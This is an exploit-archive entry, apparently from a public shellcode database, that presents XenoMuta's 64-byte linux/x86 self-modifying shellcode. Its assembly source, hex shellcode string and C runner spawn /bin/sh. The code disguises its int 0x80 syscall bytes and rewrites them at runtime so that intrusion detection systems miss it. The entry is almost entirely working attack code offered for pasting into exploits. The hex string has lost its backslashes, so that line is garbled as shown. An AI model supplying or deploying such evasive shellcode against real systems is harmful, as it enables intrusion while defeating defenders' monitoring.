[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 Self-modifying shellcode for IDS evasion 64 bytes
# Published : 2009-09-15
# Author : XenoMuta
# Previous Title : Linux - linux/x86 execve() - 51bytes
# Next Title : 14 Bytes execve("a->/bin/sh") Local-only Shellcode
/*
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ / __ / __ / /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|____/_/ /_/____/_/ /_/__,_/__/__,_/
xenomutax40phreakerx2enet
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
Description:
linux/x86 Self-modifying ShellCode for IDS evasion
creates int $0x80 syscalls on runtime.
OS: Linux
Arch: x86
Length: 64 bytes ( 35 without /bin/sh payload )
Author: XenoMuta
hola at:
str0k3, garay, fr1t0l4y, emra.
- God bless you all -
=== SOURCE CODE ====
.globl _start
_start:
jmp _findOut
_WhereAmI:
pop %edx // Save our payload's address g20
mov %edx, %esi // and save it 4 later
_loopMakeInt80s:
mov (%edx), %eax
cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and
jne _no
addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 )
mov %eax, (%edx)
_no:
incb %dl
cmp $0x41414141, %eax // Use 'AAAA' as end Marker.
jne _loopMakeInt80s
jmp *%esi // Jump to our converted code when done
_findOut:
call _WhereAmI
_payload: // Paste your shell code here and then replace
xor %edx, %edx // "xcdx80" (int $0x80) for .ascii "xca7d"
push $0xb // and end with .ascii "AAAA" as end marker
pop %eax
cltd
push %edx
push $0x68732f2f
push $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
.ascii "xcax7d" // + 0x303 = 0xcd80 (int $0x80)
.ascii "AAAA"
=== SOURCE CODE ====
*/
char shellcode[] = "xebx1cx5ax89xd6x8bx02x66x3dxcax7dx75x06x66x05x03x03x89x02xfexc2x3dx41x41x41x41x75xe9xffxe6xe8xdfxffxffxffx31xd2x6ax0bx58x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcax7dx41x41x41x41";
int main ()
{
printf("Length: %d bytesn", strlen(shellcode));
int (*sc)() = (int (*)())shellcode;
sc();
return 0;
}
// www.Syue.com [2009-09-15]